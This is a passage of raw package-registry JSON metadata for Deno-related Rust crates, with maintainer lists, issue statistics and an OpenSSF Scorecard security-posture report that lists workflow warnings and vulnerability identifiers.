repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-23T06:42:24.270Z","dependent_packages_count":1,"downloads":56352,"downloads_period":"total","dependent_repos_count":2,"rankings":{"downloads":13.654873340737215,"dependent_repos_count":13.317204097833892,"dependent_packages_count":18.15597474766567,"stargazers_count":0.0022664944130912717,"forks_count":0.058173356602675974,"docker_downloads_count":null,"average":9.03769840745051},"purl":"pkg:cargo/deno-x86_64-pc-windows-msvc","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno-x86_64-pc-windows-msvc","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno-x86_64-pc-windows-msvc","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno-x86_64-pc-windows-msvc/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno-x86_64-pc-windows-msvc/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno-x86_64-pc-windows-msvc/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno-x86_64-pc-windows-msvc/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno-x86_64-pc-windows-msvc/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno-x86_64-pc-windows-msvc/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno-x86_64-pc-windows-msvc/codemeta","maintainers":[{"uuid":"28170","login":"ry","name":"Ryan Dahl","email":null,"url":"https://github.com/ry","packages_count":18,"html_url":"https://crates.io/users/ry","role":null,"created_at":"2022-11-07T18:29:41.272Z","updated_at":"2022-11-07T18:29:41.272Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/ry/packages"},{"uuid":"45082","login":"piscisaureus","name":"Bert Belder","email":null,"url":"https://github.com/piscisaureus","packages_count":12,"html_url":"https://crates.io/users/piscisaureus","role":null,"created_at":"2022-11-07T18:29:41.280Z","updated_at":"2022-11-07T18:29:41.280Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/piscisaureus/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":334031,"maintainers_count":70996,"namespaces_count":0,"keywords_count":71627,"github":"rust-lang","metadata":{"funded_packages_count":30452,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-01T05:05:21.464Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":4047508,"name":"deno_typescript","ecosystem":"cargo","description":"To compile TypeScript to a snapshot during build.rs","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":45,"first_release_published_at":"2019-08-15T07:44:12.176Z","latest_release_published_at":"2020-07-13T17:13:37.376Z","latest_release_number":"0.49.0","last_synced_at":"2026-08-29T21:56:53.370Z","created_at":"2022-04-12T10:01:21.314Z","updated_at":"2026-08-31T01:09:50.992Z","registry_url":"https://crates.io/crates/deno_typescript/","install_command":"cargo install deno_typescript","documentation_url":"https://docs.rs/deno_typescript/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-29T19:17:00.000Z","size":248743,"stargazers_count":108340,"open_issues_count":1540,"forks_count":6359,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-29T21:56:41.390Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-29T20:05:41.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable 